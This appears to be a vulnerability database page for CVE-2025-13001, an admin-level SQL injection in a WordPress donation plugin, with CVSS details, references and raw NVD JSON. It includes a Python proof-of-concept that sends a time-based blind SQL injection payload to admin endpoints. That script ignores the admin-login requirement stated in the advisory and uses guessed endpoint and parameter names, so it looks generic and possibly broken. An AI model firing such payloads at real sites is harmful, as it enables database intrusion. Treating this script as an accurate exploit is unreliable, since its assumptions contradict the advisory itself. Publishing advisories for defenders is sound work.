CVE-2025-13001

Description

The donation WordPress plugin through 1.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing high privilege users, such as admin to perform SQL injection attacks

CVSS Details

CVSS Score

4.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:kieranoshea:donations:*:*:*:*:*:wordpress:*:* - VULNERABLE

donation WordPress plugin <= 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'
# SQL Injection PoC for CVE-2025-13001
# donation WordPress Plugin <= 1.0 SQL Injection

# Blind SQL Injection payload
payload = "' AND (SELECT * FROM (SELECT(SLEEP(5)))a) AND '"

# Example vulnerable endpoint (may vary based on plugin configuration)
endpoints = [
    '/wp-admin/admin-ajax.php',
    '/wp-admin/admin.php?page=donation_settings'
]

for endpoint in endpoints:
    url = target + endpoint
    params = {
        'action': 'donation_submit',
        'donor_name': payload
    }
    try:
        response = requests.post(url, data=params, timeout=10)
        if response.elapsed.total_seconds() >= 5:
            print(f'[+] Vulnerable endpoint found: {url}')
            print(f'[+] Time-based blind SQL injection confirmed')
    except requests.exceptions.RequestException:
        pass

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13001
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13001
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13001/
[4] VulDB https://vuldb.com/cve/CVE-2025-13001
[5] https://wpscan.com/vulnerability/4e7a8154-46bf-44c9-ad9a-273e99ae2104/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13001", "sourceIdentifier": "[email protected]", "published": "2025-12-02T06:15:45.543", "lastModified": "2026-01-30T20:42:15.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The donation WordPress plugin through 1.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing high privilege users, such as admin to perform SQL injection attacks"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kieranoshea:donations:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.0", "matchCriteriaId": "852C53CF-E12F-46C7-9B82-74B00486ED29"}]}]}], "references": [{"url": "https://wpscan.com/vulnerability/4e7a8154-46bf-44c9-ad9a-273e99ae2104/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}